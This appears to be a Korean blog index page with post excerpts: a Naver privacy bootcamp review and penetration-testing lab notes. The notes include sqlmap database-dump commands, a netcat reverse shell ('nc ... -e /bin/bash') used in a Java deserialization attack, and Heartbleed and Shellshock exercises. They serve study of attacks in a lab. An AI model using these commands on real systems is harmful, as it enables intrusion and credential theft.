분류 전체보기99 '조고바방' 팀의 Naver PER BootCamp 참가 후기! 안녕하세요! 조고바방 팀에서 방을 맡은 저의 Naver PER BootCamp 참가 후기를 공유하고자 글을 작성하게 되었습니다. 그럼, 따끈따끈한 후기 시작합니다~! 우선 저희 팀은 예비 1번이었는데 한 팀이 캠프에 참가를 못하게 되어 합격하게 되었어요. 소중한 기회가 왔기 때문에 꼭 붙잡고 싶었어요. 바로 참가가 가능하다고 회신을 드렸습니다!!(와아) 캠프에 참가하기 전 미션이 있었는데요, 사전에 ①개인정보 보호 관련 기본 교육을 듣고 ②캠프 당일 발표할 PPT를 준비하는 것이었습니다! 그리고 여기서 잠깐! NAVER PER BootCamp 인만큼 PER 제도를 숙지하고 가야겠죠?? PER제도(Privacy Enhancement Reward)란, PER(Privacy Enhancement Reward).. 2019. 7. 12. Chapter 18. 실전 모의해킹 최종 실습 1. 정보 수집 - 파라미터 값이 달라지는 것을 발견 2. SQL 인젝션 공격 - ‘을 입력했을 때 SQL 형식 관련 에러가 발생하는 것을 볼 수 있음 sqlmap -u “http://192.68.37.133/cat.php?id=1’ - 위 명령어를 통해 sqlmap을 실행시켜 인젝션 공격이 가능한 부분을 탐색, 굵게 표시된 부분을 보니 id 파라미터가 들어가는 곳이 취약 - sql 인젝션 공격과 xss 공격이 가능한 것을 확인 sqlmap -u "http://192.168.37.133/cat.php?id=1" --current-db - 현재 DB의 이름을 알아내고, sqlmap -u "http://192.168.37.133/cat.php?id=1" -D photoblog --dump - DB.. 2019. 3. 14. Chapter 17. 자바 역직렬화 취약점 공격 자바 역직렬화 취약점 공격 개요 - 저장되어 있는 바이트 스트림을 다시 객체로 만들어 원래의 데이터를 다시 불러오는 과정 - aced0005라는 문자열은 직렬화된 데이터의 앞에 항상 나타나는 문자열로, 매직 바이트임 자바 역직렬화 취약점 공격 실습 - 저장되어 있는 바이트 스트림을 다시 객체 - 전송되고 있는 파일의 타입을 통해 직렬화된 데이터를 발견 - 직화된 데이터가 있군 nc -lvnp 4000 - 서버로 실행해두기 nc 칼리리눅스 주소 4000 -e /bin/bash - nc 접속을 위한 명령문 - 원하는 명령어를 실행할 수 있는 공격 코드 만들기 위해서 공격코드를 reverse.bin 파일로 생성 - 다시 요청하기 위해 Repeater로 전송하고 파일의 바디 부분에서 paste from file.. 2019. 3. 14. Chapter 16. 알려진 취약점을 이용한 공격 하트블리드 취약점 공격 실습 - 하트블리드 취약점을 이용하면 공격자는 웹 서버 호스트의 메모리를 읽을 수 있어 사용자의 로그인 정보 및 그 밖에 노출되면 안되는 민감한 정보들을 탈취할 수 있음 - 앞에 https와 8443 포트 번호붙이고 접속 - 터미널에서 하트블리드 파일 실행시키면 id/패스워드가 보임 쉘쇼크 취약점 공격과 리버스 쉘 실습 - 쉘쇼크는 bash 쉘의 취약점 env x=’() { :;}; echo vulnerable’ bash -c ‘echo this is test’ - 쉘쇼크 취약점이 있는지 판단할 수 있는 명령문, x 환경 변수에 쉘쇼크 공격 패턴과 명령어를 지정한 뒤 bash 쉘을 실행하여 지정한 명령어가실행되는지 확인 - 쉘쇼크에 취약하지 않은 경우 DANGER 표시X nc -e.. 2019. 3. 14. 이전 1 ··· 16 17 18 19 20 21 22 ··· 25 다음